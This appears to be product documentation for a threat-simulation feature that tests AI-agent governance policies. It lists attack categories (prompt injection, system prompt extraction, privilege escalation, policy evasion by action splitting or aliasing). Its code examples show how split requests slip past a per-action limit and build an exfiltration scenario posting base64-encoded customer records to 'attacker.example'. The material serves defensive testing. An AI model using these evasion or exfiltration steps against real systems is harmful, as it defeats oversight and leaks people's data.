Threat Simulation
Threat Simulation lets you test your governance policies against adversarial attack scenarios so you can find coverage gaps before real attackers exploit them.
Overview
AI agents face a range of attack vectors, from prompt injection to privilege escalation. Threat Simulation provides a library of pre-built attack scenarios and a custom scenario builder so you can verify that your governance policies catch these threats.
Pre-Built Scenarios
TheWARDN ships with 80+ pre-built attack scenarios, organized by category:
Prompt Injection
Scenarios where an attacker attempts to manipulate an AI agent through crafted input:
- Direct instruction override attempts
- Indirect injection via data sources
- Context window manipulation
- System prompt extraction attempts
Privilege Escalation
Scenarios where an agent attempts to gain access beyond its authorized scope:
- Tier bypass attempts (acting above assigned tier)
- Grant expiration exploitation
- Cross-agent impersonation
- Role elevation through action chaining
Data Exfiltration
Scenarios where an agent attempts to extract sensitive data:
- Data leakage through outbound actions
- Encoding-based exfiltration attempts
- Side-channel information disclosure
- Bulk data access patterns
Policy Evasion
Scenarios designed to circumvent governance rules:
- Action type aliasing (renaming actions to avoid blocks)
- Confidence score manipulation
- Rate limit circumvention through action splitting
- Reasoning field exploitation
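To make the action-splitting item concrete, here is a minimal sketch of why a limit checked per action can be evaded by splitting one large request into several small ones, while a cumulative limit catches it. The limits, function names, and row counts are all hypothetical; this illustrates the attack pattern and is not TheWARDN's detection logic.

```python
# Hypothetical limits, chosen only for illustration.
PER_ACTION_LIMIT = 1000   # max rows a single action may request
WINDOW_LIMIT = 1000       # max rows an agent may request across a time window


def per_action_policy(rows_requested: int) -> bool:
    """Return True if this single action should be blocked."""
    return rows_requested > PER_ACTION_LIMIT


def cumulative_policy(history: list[int], rows_requested: int) -> bool:
    """Return True if this action would push the agent's total past the window limit."""
    return sum(history) + rows_requested > WINDOW_LIMIT


# The attacker wants 1200 rows and splits the request into three smaller actions.
split_attack = [400, 400, 400]

# Checked one at a time, no action exceeds the per-action limit.
per_action_blocked = [per_action_policy(rows) for rows in split_attack]

# Checked cumulatively, the third action crosses the window limit.
history: list[int] = []
cumulative_blocked = []
for rows in split_attack:
    blocked = cumulative_policy(history, rows)
    cumulative_blocked.append(blocked)
    if not blocked:
        history.append(rows)  # only allowed actions count toward the total

print(per_action_blocked)   # [False, False, False]
print(cumulative_blocked)   # [False, False, True]
```

A scenario of this kind is useful precisely because each individual action looks harmless; only the sequence reveals the attack.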
Denial of Service
Scenarios targeting governance pipeline availability:
- Action flooding
- Escrow queue saturation
- Hash chain computation overload
Custom Scenario Builder
If the pre-built library does not cover your specific concerns, build your own threat scenario:
- Define the attack vector and objective
- Configure the simulated agent behavior
- Set up the sequence of actions the attacker would attempt
- Run the scenario against your current policies
- Review the results
TIP
Custom scenarios are saved to your library for future reuse. Build scenarios that reflect the specific threat model of your industry and deployment.
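The builder steps above map naturally onto a small data structure. The sketch below is one way to think about what a custom scenario contains: an attack vector, an objective, the simulated agent's configuration, and an ordered sequence of attempted actions. Every class, field, and action name here (`ThreatScenario`, `agent_tier`, `db.read`, and so on) is an assumption made for illustration, not TheWARDN's actual scenario format.

```python
from dataclasses import dataclass, field
from typing import Any


@dataclass
class SimulatedAction:
    """One step the simulated attacker attempts (hypothetical shape)."""
    action_type: str
    params: dict[str, Any] = field(default_factory=dict)


@dataclass
class ThreatScenario:
    """A custom scenario: vector, objective, agent setup, and ordered actions."""
    name: str
    attack_vector: str
    objective: str
    agent_tier: int  # assumed way of configuring the simulated agent
    actions: list[SimulatedAction] = field(default_factory=list)

    def then(self, action_type: str, **params: Any) -> "ThreatScenario":
        """Append the next action in the attack sequence and return self for chaining."""
        self.actions.append(SimulatedAction(action_type, params))
        return self


scenario = (
    ThreatScenario(
        name="Bulk customer export",
        attack_vector="data_exfiltration",
        objective="Copy customer records to an external endpoint",
        agent_tier=1,
    )
    .then("db.read", table="customers", rows=5000)
    .then("encode", scheme="base64")
    .then("http.post", url="https://attacker.example/upload")
)

print([action.action_type for action in scenario.actions])
```

Keeping the actions as an ordered list matters because several attack categories, such as role elevation through action chaining, depend on the sequence rather than on any single action.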
Running Simulations
To run a threat simulation:
- Select one or more scenarios from the library
- Choose which policy set to test against (current production or a draft set)
- Click Run Simulation
- Review the results
Simulation Results
For each scenario, the results show:
| Field | Description |
|---|---|
| Scenario | Name and description of the attack |
| Actions Attempted | Number of actions the attacker tried |
| Caught | Number of attempted actions that governance blocked or held |
| Missed | Number of attempted actions that governance allowed through |
| Policies That Fired | Which policies detected the attack |
| Coverage | Percentage of attack actions that were caught |
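As a rough illustration of how these fields relate, the sketch below models one result row. It assumes that every attempted action is either caught or missed, so Missed is Actions Attempted minus Caught, and it computes Coverage as caught actions divided by attempted actions. The class and field names are hypothetical and the numbers are made up.

```python
from dataclasses import dataclass


@dataclass
class ScenarioResult:
    """One row of simulation results (hypothetical structure)."""
    scenario: str
    actions_attempted: int
    caught: int
    policies_fired: list[str]

    @property
    def missed(self) -> int:
        # Assumes each attempted action is either caught or missed.
        return self.actions_attempted - self.caught

    @property
    def coverage(self) -> float:
        """Percentage of attempted actions that were caught."""
        if self.actions_attempted == 0:
            return 0.0  # avoid dividing by zero for an empty scenario
        return 100.0 * self.caught / self.actions_attempted


result = ScenarioResult(
    scenario="Tier bypass attempt",
    actions_attempted=8,
    caught=6,
    policies_fired=["tier-enforcement"],  # illustrative policy name
)

print(f"{result.scenario}: {result.coverage:.0f}% coverage, {result.missed} missed")
# prints "Tier bypass attempt: 75% coverage, 2 missed"
```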
Coverage Gap Identification
After running simulations, TheWARDN identifies coverage gaps -- attack scenarios where some or all malicious actions were not caught by current policies. For each gap, the system provides:
- Which attack actions were missed
- Why existing policies did not catch them
- Suggested policy changes to close the gap
WARNING
A coverage gap does not necessarily mean you are vulnerable -- it means your governance policies did not catch the simulated attack. Review each gap in context to determine whether a policy change is warranted or whether the scenario does not apply to your deployment.
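Conceptually, a coverage gap is any scenario with at least one action that governance neither blocked nor held. The sketch below shows that filtering step on made-up data. The decision labels (`allow`, `block`, `hold`), the function name, and the action names are assumptions for illustration; the explanation of why a policy missed an action and the suggested policy changes are produced by TheWARDN itself and are not modeled here.

```python
# Decisions that count as "caught", following the results table (blocked or held).
CAUGHT_DECISIONS = {"block", "hold"}


def find_coverage_gaps(
    outcomes: dict[str, list[tuple[str, str]]],
) -> dict[str, list[str]]:
    """Map each scenario with missed actions to the list of those actions.

    `outcomes` maps a scenario name to (action, decision) pairs.
    Scenarios where every action was caught are omitted from the result.
    """
    gaps: dict[str, list[str]] = {}
    for scenario, actions in outcomes.items():
        missed = [
            action for action, decision in actions
            if decision not in CAUGHT_DECISIONS
        ]
        if missed:
            gaps[scenario] = missed
    return gaps


# Made-up simulation outcomes for two scenarios.
outcomes = {
    "Direct instruction override": [("send_email", "block"), ("read_file", "hold")],
    "Encoding-based exfiltration": [("encode_payload", "allow"), ("http_post", "block")],
}

gaps = find_coverage_gaps(outcomes)
print(gaps)  # {'Encoding-based exfiltration': ['encode_payload']}
```

In this example the second scenario is only partially covered: the outbound request is blocked, but the encoding step passes unchallenged, which is the kind of gap worth reviewing in context.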
Regular Testing
Run threat simulations on a regular cadence, especially:
- After adding or modifying policies
- After registering new agents
- After changing tier mappings
- Before compliance audits
- When new attack vectors are added to the library
Related Features
- Governance Lab -- General-purpose policy testing sandbox
- Governance Policies -- Create policies to close coverage gaps
- Compliance Packs -- Pre-built policy sets designed for regulatory coverage